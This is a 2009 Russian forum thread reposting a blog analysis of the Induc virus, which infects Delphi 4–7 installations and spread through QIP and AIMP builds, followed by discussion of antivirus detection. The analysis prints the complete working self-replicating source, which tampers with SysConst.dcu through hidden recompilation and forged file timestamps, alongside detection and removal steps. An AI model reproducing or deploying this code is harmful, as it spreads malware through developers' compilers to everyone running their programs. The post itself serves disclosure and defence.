Delphi-вирус Опции

[Umnik]

Запускаю с утра Миранду, она обнаруживает обновление плагина vkontakte. В чейнджлоге всего один фикс:

Version 0.3.0.5
- новая версия, избавленная от Delphi-вируса (http://gunsmoker.blogspot.com/2009/08/delphi-delphi.html)

Вот копи-паст с указанного адреса:

Delphi-”вирус”: проверьте свою установленную Delphi!
Сегодня обнаружил довольно интересную вредоносную бяку, специфичную именно для Delphi. Это весьма простой, написанный на Delphi, саморазмножающийся код, который иначе как ”вирусом” назвать нельзя. Особенность его в том, что он поражает только установленные Delphi версий 4-7 (включительно), так что любая программа, скомпилированная в ”поражённых” Delphi, будет содержать в себе копию этого вредоносного кода и заражать любые другие найденные Delphi.

Для тех, кто не сильно хочет вникать в детали, вот краткая выдержка (окей, я просто адаптировал объявление с DK, но для надёжности вам лучше бы прочитать пост целиком):

Суть кода в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP и проигрывателя AIMP оказались заражены им (команды разработчиков приносят за это свои извинения).

Пока единственный обнаруженный вредный эффект от вируса - это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои установки Delphi (версий с 4 по 7 включительно) и, если найдёте у себя SysConst.bak, выполните следующие действия:

1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске - это убережёт систему от повторного заражения, т.к. вирус не производит заражения, если находит SysConst.bak, считая, что свою работу он уже выполнил.

Не пытайтесь найти вирус в SysConst.pas: его там НЕТ!

Как это началось
Собственно началось всё с обсуждения странной проблемы: Run-time error 3 на, казалось бы, ровном месте. Затем участник с ником Andrey заметил, что проблема как-то связана с QIP 2005 сборки 8094, а именно: изменяется файл SysConst.dcu в папке \Lib установленной Delphi. Несколько человек после этого подтвердили это сообщение, но не стали копать дальше.

Признаться, сперва мне казалось это либо неверными выводами (я работаю в саппорте EurekaLog и тут не счесть случаев, когда человек в чём-то уверен, но на деле всё совсем не так), либо с инфицированными ”настоящими” вирусами сборками с левых сайтов. Хотя изменение именно специфичного для Delphi файла выглядело очень подозрительно. Поэтому когда я приступил к проверке, то для себя я остановился на варианте забытого отладочного кода в QIP или чем-то подобном (я знал, что QIP написан на Delphi).

Однако, установив QIP, скачанный с официального сайта, я убедился в том, что он (сам qip.exe) действительно изменяет файлы SysConst.dcu в папках \Lib установленных Delphi версий 4-7, создавая резервную копию в виде файла SysConst.bak. Я проверял, установив его на WinXP VMWare с установленными Delphi всех версий (кроме 1, разумеется). Подтвердив проблему, я запостил вот эту тему на форуме QIP.

Что это такое
Ну а дальше – надо было просто поглубже копнуть, чтобы посмотреть, что же именно за изменение вносится в SysConst.dcu. В итоге и был обнаружен этот вредоносный код, который выглядит примерно вот так:

Код

uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var
  i:integer;
begin
  for i:=1 to length(s) do
    if s[i]=#36 then s[i]:=#39;
  result:=s;
end;

procedure re(s,d,e:string);
var
  f1,f2:textfile;
  h:cardinal;
  f:STARTUPINFO;
  p:PROCESS_INFORMATION;
  b:boolean;
  t1,t2,t3:FILETIME;
begin
  h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h<>DWORD(-1) then
  begin
    CloseHandle(h);
    exit;
  end;
  {'I-}assignfile(f1,s);
  reset(f1);
  if ioresult<>0 then
    exit;
  assignfile(f2,d+'pas');
  rewrite(f2);
  if ioresult<>0 then
  begin
    closefile(f1);
    exit;
  end;

  while not eof(f1) do
  begin
    readln(f1,s);
    writeln(f2,s);
    if pos('implementation',s)<>0 then
      break;
  end;

  for h:= 1 to 1 do
    writeln(f2,sc[h]);
  for h:= 1 to 23 do
    writeln(f2,''''+sc[h],''',');
  writeln(f2,''''+sc[24]+''');');
  for h:= 2 to 24 do
    writeln(f2,x(sc[h]));
  closefile(f1);
  closefile(f2);
  {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
  fillchar(f,sizeof(f),0);
  f.cb := sizeof(f);
  f.dwFlags := STARTF_USESHOWWINDOW;
  f.wShowWindow := SW_HIDE;
  b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
  if b then
    WaitForSingleObject(p.hProcess,INFINITE);
  MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
  DeleteFile(pchar(d+'pas'));
  h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h=DWORD(-1) then
    exit;
  GetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
  h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
  if h=DWORD(-1) then
    exit;
  SetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
end;

procedure st;
var  
  k:HKEY;
  c:array [1..255] of char;
  i:cardinal;
  r:string;
  v:char;
begin
  for v:='4' to '7' do
    if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
    begin
      i:=255;
      if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
      begin
        r:='';
        i:=1;
        while c[i]<>#0 do
        begin
          r:=r+c[i];
          inc(i);
        end;
        re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
      end;
    RegCloseKey(k);
  end;
end;

begin
  st;
end.

Весьма несложный код и вы можете разобраться с тем, что он делает, самостоятельно.

Во-первых, он проверяет, не установлена ли на машине Delphi (перебор ключей реестра в procedure st). Если да, то код берёт файл SysConst.pas, дописывает в него себя и компилирует с помощью Delphi-же, помещая новый (уже инфицированный) dcu в папку \Lib (предварительно сделав копию, которая одновременно служит признаком инфицирования), а изменённый pas-файл – удаляет.

Откуда берётся этот самый run-time error 3, который позволил обнаружить этот вредоносный код? Ну, в код закралась ошибочка: если в реестре записан какой-либо неверный путь (например, раньше стояла Delphi 6, а теперь её нет, но ключ остался), то код вылетает вот тут:

Код

  {'I-}assignfile(f1,s);
  reset(f1); // <- возбуждается исключение, если в s записан неверный путь

При вызове reset возбуждается исключение, которое при не инициализированном SysUtils приводит в выбросу ошибки run-time error 3. Интересно, что от этой ситуации должна была защищать директива {$I-} и обработка IOResult, но поскольку автор неудачно выбрал именно символ $ как служебный (в константе sc вместо апострофа), то обратный патч строки превратил {$I-} в {'I-}, что и привело к этой ошибке.

Насколько это серьёзно
Ну, если говорить о популярности этой бяки, то я сделал быстрый QIP-опрос знакомых дельфистов и у примерно 30% из них оказалась эта бяка. Т.е. если учитывать, что не у всех стоят старые Delphi, то среди D7-ков эта штука вполне может быть неплохо распространена.

Если говорить о конкретном вреде, то этот вирус безобиден, т.к. не делает ничего, кроме размножения. От него не было бы вообще никакого отрицательного эффекта, если бы не вышеуказанная ”досадная” ошибка в коде, приводящая к Runtime error 3 на редких машинах.

Собственно пишу я этот пост не потому, что это так уж серьёзно, а, скорее, потому, что это довольно любопытная вещь. Ну и предупредить, конечно: эвон чего бывает. В следующий раз, если вдруг столкнётесь с его братом, будете в курсе.

Кто виноват и что делать
В топике также сообщили о наличии этой же проблемы у некоторых версий популярного проигрывателя AIMP. Ну, быстрый поиск в интернете показал, что подвержены этой пакости оказались не только QIP и AIMP, но и другие программы. Например, вот тут в комментариях сообщается о заражении некоторых плагинов к Miranda. Понятно, что сами программы тут не причём – просто была заражена Delphi, на которых выполнялась сборка дистрибутивов. Увы, антивирусы такие ”высокоуровневые вирусы” не ловят (хорошо бы, кстати, отправить этот код разработчикам какого-нибудь антивируса).

Ну, собственно, что вы можете сделать: если вы используете Delphi 4 – Delphi 7, то проверьте свои Delphi, не инфицированы ли они. Посмотрите в папку \Lib: если там есть файл SysConst.bak, то вы заражены (*).

Что делать, чтобы избавиться от вируса? Удалите файл SysConst.dcu, а затем на его место скопируйте SysConst.bak, т.е.: SysConst.bak –> SysConst.dcu. Помимо избавления от вируса, это также предотвратит повторное заражение. Ну, лучше всего, конечно, взять .dcu файл с дистрибутива - для надёжности (мало ли, вдруг .bak файл тоже оказался изменён).

Если вы не заражены, то вы можете предотвратить заражение в будущем (разумеется, только этим, конкретным вариантом кода), сделав что-либо из следующего (на ваш выбор, можно несколько сразу):

• Создайте файл SysConst.bak (содержимое не важно) в папках \Lib установленных Delphi. Работоспособность основывается на том факте, что вирус сперва проверяет наличие SysConst.bak. И если он есть – то ничего не делает, считая, что он уже инфицировал эти Delphi.
• Просто запретить доступ на изменение папки \Lib (ну и \Source до кучи) вообще всем (даже админам). Ну, это не даст вирусу менять файлы, но при этом на Delphi не встанут апдейты, но это вполне действенно. Можно в принципе дать права на запись отдельной учётке и все апдейты запускать из-под неё. Ну или менять права перед установкой апдейтов и возвращать после.
• Работать в системе ”как полагается”: т.е. не под админом и программы ставить в Program Files. Благодаря этому у обычного пользователя не будет прав на запись в папку, так что ваши файлы останутся в неприкосновенности. А апдейты для Delphi вы всё равно под админом запускать будете. Ну, раньше я уже говорил про Vista-у и пользу UAC в частности. Вот это как раз пример для этого случая.

Замечу, что подобной простой панацеи для уже скомпилированных в заражённой Delphi файлов нет: вам придётся пересобрать их заново. А чтобы определить, какие файлы заражены: запустите поиск по диску всех файлов, содержащих любую "говорящую" подстроку из константы, например: "CreateFile(pchar(d+$bak$),0,0,0,3,0,0)" (без кавычек, разумеется). Также это поможет найти, кто же принёс на вашу машину эту бяку: если вы нашли инфицированный файл, собранный не вами, то это и есть виновник проблем на вашей машине.

Ну, лично мне все эти проблемы по барабану, т.к. я:

• Работаю в Vista и Delphi стоит в Program Files, что значит, что её файлы защищены ACL списками.
• Использую D2007 и D2009, а конкретно этот товарищ инфицирует только D4-D7.
• Не использовал инфицированные варианты QIP и AIMP (ну, тут просто повезло).

Но то, что эти проблемы мне не грозят, не значит, что о них не надо сказать: кто предупреждён, тот вооружён. Удачи

Примечания:

(*) Ну, на самом деле, наличие файла SysConst.bak ещё не говорит со 100% точностью о заражении. Вы вполне могли создать этот файл сами или он был создан каким-нибудь вполне легитимным патчем. Чтобы убедиться на 100%, откройте файл SysConst.dcu (dcu, а не bak, т.к. в bak-е лежит девственный оригинал) в блокноте или по F3 в двух-панельном менеджере и поищите строчку ”closefile(f2);” (без кавычек, разумеется). Если нашли – то ваша Delphi точно заражена. Таким же образом можно проверить и собранный exe-файл. Но проверка на SysConst.bak не даёт гарантии от поражения аналогичными вирусами. Конкретно этот экземпляр выдаёт себя наличием файла SysConst.bak. Другие могут не быть столь беспечны, поэтому 100% надёжный способ - сравнить папки \Lib и \Source с дистрибутивными: поставьте куда-нибудь чистую Delphi на чистую машину (лучше всего с read-only сидюка или ISO-образа) и сравните свои папки с чистыми. Только убедитесь, что сервис-паки и апдейты совпадают.

-----------------------------------

Вот еще ссылка на Хабр: http://habrahabr.ru/blogs/virus/66937/

[OlegSych]

Это пяць! Проникся!

[av killer]

Код отправили к примеру в Авиру?

[AlexxSun]

Неужели сбылось наконец-то?

Прямо сегодня после обновления баз на KIS 7.0.1.325 детектируем в QIP версии 8094 Virus.Win32.Induc.a


Жалко, если это сочтут за фолс и уберут детект, было бы хорошим уроком создателям QIPa чтобы впредь не пихали всякую дрянь в свои инсталляторы

http://www.virustotal.com/ru/analisis/3a99...f2cc-1250351440


Похоже, что не фолс, пояснения тут : http://habrahabr.ru/blogs/virus/66937/

http://forum.qip.ru/showthread.php?p=314885

[Yen-Jasker]

http://kltest.org.ru/viewtopic.php?f=19&am...87237e0d#p12745
КИС ругается на квип, находит "индюка", Virus.Win32.Induc.a
Но он ругается и на один из активаторов для Windows 7, с таким же вердиктом. Это странно, может это фолс или "индюк" - туфта?
Аналитики, откуда взялся "индюк"? По-моему нужно проверить семплы зараженных файлов и разобраться что попало в базы.
На viruslist такой зловред не значится.

[Valery Ledovskoy]

КИС ругается на квип, находит "индюка", Virus.Win32.Induc.a

И что? Отправьте с вердиктом False alarm и ждите ответа.

Но он ругается и на один из активаторов для Windows 7, с таким же вердиктом.

И что, в одном из "активаторов" Windows 7 не может быть вредоноса? Все активаторы поддерживаются MS?

На viruslist такой зловред не значится.

И что? Если вредонос в библиотеке не описан, то это подозрительно? Посчитайте, сколько нужно сейчас техписателей, чтобы описать каждый вредонос.

Да, были люди в наше время,
Не то, что нынешнее племя.

[Yen-Jasker]

И что? Если вредонос в библиотеке не описан, то это подозрительно? Посчитайте, сколько нужно сейчас техписателей, чтобы описать каждый вредонос.

Когда запись о вредоносе есть, но описания нет - так бывает. А вредонос induc.a вообще не находится по базе viruslist, впервые сталкиваюсь с таким случаем.
Предлагаю обойтись без пространных фраз о нынешнем племени, а разобраться что это за зловред. К сожалению, известны случаи ошибок в антивирусных базах.

[Valery Ledovskoy]

А вредонос induc.a вообще не находится по базе viruslist, впервые сталкиваюсь с таким случаем.

И чо? О чём это лично вам говорит? Если нет описания, то нет и вредоноса?

К сожалению, известны случаи ошибок в антивирусных базах.

Известны, и немало. Когда Вы сообщили о ложном срабатывании?
Может быть, не знаете, куда писать? Адрес, куда писать, находится в 2 клика. Только мало кто знает, что в теме лучше False Alarm писать
Или скажут, что мы уже знаем этого вредоноса, и он будет добавлен в базы при следующем обновлении )
Касперский - точно такой же антивирус, как и другие. Точно такие же схемы взаимодействия (надеюсь), что и с другими вирлабами.

[akoK]

Известны, и немало. Когда Вы сообщили о ложном срабатывании?

Это не ложное срабатываение.

http://habrahabr.ru/blogs/virus/66937/

[Valery Ledovskoy]

Это не ложное срабатываение. smile.gif

Значит, всё хорошо. Miranda IM forever. И описания на viruslist ни при чём снова. Можно спать спокойно, чего и всем желаю

[Yen-Jasker]

И чо? О чём это лично вам говорит? Если нет описания, то нет и вредоноса?

Вы опять про описание. Нет даже названия такого вредоноса на вируслисте. Даже для несуществующих вирусов, ошибочно записанных аналитиками в базу, названия на вируслисте были.
Но может это и в самом деле вирус, нужно разбираться.

Но сейчас не нужно злорадствовать по поводу того, что ЛК задетектила QiP Infium как "индюка" за его зловредные функции. Детектируется не сам квип, а вирус, который заразил Дельфи, установленный у разрабов Квипа.

[Umnik]

http://www.kaspersky.ru/viruswatchlite?sea...amp;x=0&y=0
Главное, он указан здесь.

Yen-Jasker
Надеюсь, "разбирательств" больше не будет
http://www.kaspersky.ru/viruswatchlite?sea...amp;x=0&y=0
http://www.securelist.com/ru/find?words=na...amp;searchtype=

[Юрий Паршин]

Детект квипа 8094 - не фолса. Он действительно заражен.

[Yen-Jasker]

http://www.kaspersky.ru/viruswatchlite?sea...amp;x=0&y=0
Главное, он указан здесь.

Yen-Jasker
Надеюсь, "разбирательств" больше не будет
http://www.kaspersky.ru/viruswatchlite?sea...amp;x=0&y=0
http://www.securelist.com/ru/find?words=na...amp;searchtype=

По первой ссылке указан induc.a, а по третьей какой-то NanoDesu, это один и тот же вирус?

Детект квипа 8094 - не фолса. Он действительно заражен.

Спасибо.

Вот и разобрались, чтобы не путать две разные проблемы.

Неужели сбылось наконец-то?

Прямо сегодня после обновления баз на KIS 7.0.1.325 детектируем в QIP версии 8094 Virus.Win32.Induc.a


Жалко, если это сочтут за фолс и уберут детект, было бы хорошим уроком создателям QIPa чтобы впредь не пихали всякую дрянь в свои инсталляторы

[Umnik]

По первой ссылке указан induc.a, а по третьей какой-то NanoDesu, это один и тот же вирус?

Видимо, я слишиком сжато пояснил, практически не пояснил.
Вредонос указан в вирусвоче, этого достаточно. В вируслисте нет очень многих вредоносов, это я показал на примере nanodesu, первое, что вспомнил из непопулярного.

[Dr.Golova]

Однако... Казалось бы что этот вирус не жилец и чистый концептуал - только дэльфи и только если есть сорцы... Но оказывается, что на этой мертвой платформе не только полно "разработчиков", но они еще и запускают все без разбора на сборочных машинах, и потом выкладывают эти поделки всем желающим. И пипл это хавает! Трижды КУ.

[Umnik]

Теоритическая выкладка:
1. Появляется подобный зверек для С++/С/С#/не_важно из Студии
2. Заражает С++ в какой-нибудь антивирусной компании
3. Антивирус заражает своих пользователей программистов
Возможно?

[Umnik]

История Индюка от Лаборатории Касперского.

[priv8v]

2. Заражает С++ в какой-нибудь антивирусной компании

Будем надеятся, что в АВ-компаниях на сборочных компах не запускают всякую ересь

А может кто-нибудь выложить какой-нибудь hello_world, скомпилированный в делфи, зараженной этим вирусом?..

[Андрей-001]

Популярность QIP-семейства и ему подобных в большей степени способствовала распространению "индюка".
Сейчас очень редко не встретишь на ПК пользователей одну их его версий.
Его нет только у тех, у кого пока нет интернет-доступа, равнозначно у них нет и "индючьего" следа.

На днях на ПК клиентов стала проявляться ещё одна хрень, у неё пока нет антивирусного детекта и т.б. названия, но симптомы у всех аналогичны. Главным образом ей подвержены компьютеры "вконтактёров", "одноклассников" и "моймирщиков".